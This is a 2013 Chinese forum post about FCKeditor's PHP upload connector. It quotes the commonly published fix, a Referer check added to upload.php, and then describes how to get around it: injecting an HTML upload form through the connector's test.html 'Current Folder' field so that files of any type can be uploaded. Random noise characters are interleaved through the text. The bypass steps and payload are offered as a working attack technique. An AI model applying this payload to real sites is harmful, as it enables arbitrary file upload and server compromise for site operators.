找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2167|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
6 H1 |- v# L6 G5 ~6 R7 q# z网上给出的修复方案是$ x' f4 Y9 Y( h1 U6 ^) R# p
修复方法,删除FCK编辑器用其他的编辑器
" Z: e4 Y; s6 Y# K9 j或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件4 E& ~5 V3 I) }/ @9 |- z9 d
2 L: v1 M# I  N' D, K  ~8 f9 Y
require(‘config.php’);3 _7 X) b& a# X# Q+ M9 o
require(‘util.php’);
% F& _5 V7 ?$ P的下面添加以下代码—————————–, U% ~% N, q% U
//防止外部提交
% e. u' s* _: E. E2 i* {' D) Dfunction outsidepost()
8 P1 I% o$ t4 \5 h7 [7 Q{
) y6 v+ b; P4 f  _1 a$servername=$_SERVER['SERVER_NAME'];
. H. I3 I+ `+ N" c' b* P$sub_from=@$_SERVER['HTTP_REFERER'];. H- e2 d2 p8 z/ O# Q- `3 s
$sub_len=strlen($servername);# [: ?, }: w+ {' d0 W
$checkfrom=substr($sub_from,7,$sub_len);
1 x% S/ ?! h- ]8 w/ G; Mif($checkfrom!=$servername){& r5 R8 O9 R* \) E! W& h
echo(“you don’t outsidepost!”);4 [# I! G: }! r1 T
exit;
( n! q- ?7 P& Q  x}
/ ?4 R4 }. G# I, E- r7 E}- ]( J, P: x4 ]: U
outsidepost();3 k" L  z  D7 s7 Q6 S& U( W6 S. z
防止外部提交,但是没有防止内部提交,0 L/ l9 N# J) k0 L% W8 P; @8 ~3 H
利用方法:
6 n4 F3 @7 k( i" q- T0 n1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html* c& X/ Z6 \2 C8 i
2,在Current Folder 框输入# v0 z9 z; i- g) w2 [; `- q; W
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
) g3 T2 h  n- ]4 e$ R5 M! R' f6 K* T然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
$ H5 \4 k$ S2 H& x& x; Y- UPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表